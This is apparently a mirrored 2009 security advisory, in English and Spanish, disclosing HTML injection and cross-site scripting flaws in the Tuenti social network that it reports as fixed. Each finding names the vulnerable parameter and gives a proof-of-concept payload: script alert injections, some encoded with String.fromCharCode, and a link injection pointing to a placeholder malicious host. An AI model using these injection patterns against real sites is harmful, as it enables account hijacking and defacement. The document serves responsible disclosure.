Lucene search
K

Tuenti Cross Site Scripting

🗓️ 15 May 2009 00:00:00Reported by YEnH4ckErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Tuenti Cross Site Scripting vulnerability on social networking sit

Code
`####################  
Language: English  
####################  
  
------------------------------------------------------------  
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->  
------------------------------------------------------------  
  
SYSTEM INFORMATION:  
  
-->WEB: http://www.tuenti.com/  
-->DOWNLOAD: No there.  
-->DEMO: N/A  
-->CATEGORY: Social Networking  
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain.   
  
SYSTEM VULNERABILITY:  
  
-->TESTED ON: firefox 3 and Internet Explorer 6.0  
-->CATEGORY: HTML CODE INJECTION / XSS  
-->Discovered Bug date: 2009-05-04  
-->Reported Bug date: 2009-05-04  
-->Fixed bug date: 2009-05-12  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja  
  
  
#################  
/////////////////  
  
HTML INJECTION:  
  
/////////////////  
#################  
  
  
Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos  
  
  
Vuln GET var --> 'cat_id'  
  
  
Note: Here was not possible a XSS attack  
  
  
------------------  
PROOF OF CONCEPT:  
------------------  
  
  
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>  
  
  
Return --> New link on footer  
  
  
#############################  
/////////////////////////////  
  
CROSS SITE SCRIPTING (XSS):  
  
/////////////////////////////  
#############################  
  
  
<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>>  
  
  
Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031  
  
  
Vuln GET var --> 'items'  
  
  
------------------  
PROOF OF CONCEPT:  
------------------  
  
  
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>  
  
  
Return --> Alert message  
  
  
<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>  
  
  
Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload  
  
  
Vuln GET var --> 'cat_id'  
  
  
------------------  
PROOF OF CONCEPT:  
------------------  
  
  
http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>  
  
  
Return --> Alert message  
  
  
<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>  
  
  
Go to --> http://www.tuenti.com/?need_invite=1  
  
  
Vuln POST var --> 'email'  
  
  
------------------  
PROOF OF CONCEPT:  
------------------  
  
  
email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>  
  
  
Return --> Alert message  
  
  
----------------  
FINAL REMARK:  
----------------  
  
  
Staff's members have fixed successfully these vulnerabilites ;)  
  
  
####################  
Language: Spanish  
####################  
  
----------------------------------------------------------------------  
MÚLTIPLES VULNERABILIDADES DE INYECCIÓN DE CÓDIGO --TUENTI--ESPAÑA->  
----------------------------------------------------------------------  
  
INFORMACIÓN DEL SISTEMA:  
  
-->WEB: http://www.tuenti.com/  
-->DESCARGA: No hay  
-->DEMO: No disponible  
-->CATEGORÍA: Red social  
-->DESCRIPCIÓN: Tuenti es la mayor y más popular red social en España.   
  
VULNERABILIDAD DEL SISTEMA:  
  
-->PROBADO EN: firefox 3 y Internet Explorer 6.0  
-->CATEGORÍA: INYECCIÓN DE CÓDIGO HTML/ XSS.  
-->Fecha de descubrimiento del bug: 2009-05-04  
-->Fecha de aviso al sistema: 2009-05-04  
-->Fecha de fijación del bug: 2009-05-12  
-->Autor: YEnH4ckEr  
-->Correo: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: No disponible  
-->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->Comentario-extra: Xikitiya no me odies por esto jajaja  
  
  
#################  
/////////////////  
  
INYECCIÓN HTML:  
  
/////////////////  
#################  
  
  
Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos  
  
  
Variable GET vulnerable --> 'cat_id'  
  
  
Nota: Aquí no fue posible un ataque XSS  
  
  
-------------------  
PRUEBA DE CONCEPTO:  
-------------------  
  
  
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>  
  
  
Devuelve --> Nuevo enlace en el pie de página  
  
  
#############################  
/////////////////////////////  
  
CROSS SITE SCRIPTING (XSS):  
  
/////////////////////////////  
#############################  
  
  
<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Condición-extra: Ser amigos (víctima/atacante) +++++++++++++++++--------->>>>  
  
  
Ir a --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031  
  
  
Variable GET vulnerable --> 'items'  
  
  
-------------------  
PRUEBA DE CONCEPTO:  
-------------------  
  
  
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>  
  
  
Devuelve --> Mensaje de alerta  
  
  
<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>  
  
  
Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload  
  
  
Variable GET vulnerable --> 'cat_id'  
  
  
-------------------  
PRUEBA DE CONCEPTO:  
-------------------  
  
  
http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>  
  
  
Devuelve --> Mensaje de alerta  
  
  
<<<<---------++++++++++++++ Condición: Nada +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>  
  
  
Ir a --> http://www.tuenti.com/?need_invite=1  
  
  
Variable POST vulnerable --> 'email'  
  
  
-------------------  
PRUEBA DE CONCEPTO:  
-------------------  
  
  
email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>  
  
  
Devuelve --> Mensaje de alerta  
  
  
-------------------  
OBSERVACIÓN FINAL:  
-------------------  
  
El equipo de trabajo ha fijado con éxito estas vulnerabilidades ;)  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 May 2009 00:00Current
7.4High risk
Vulners AI Score7.4
25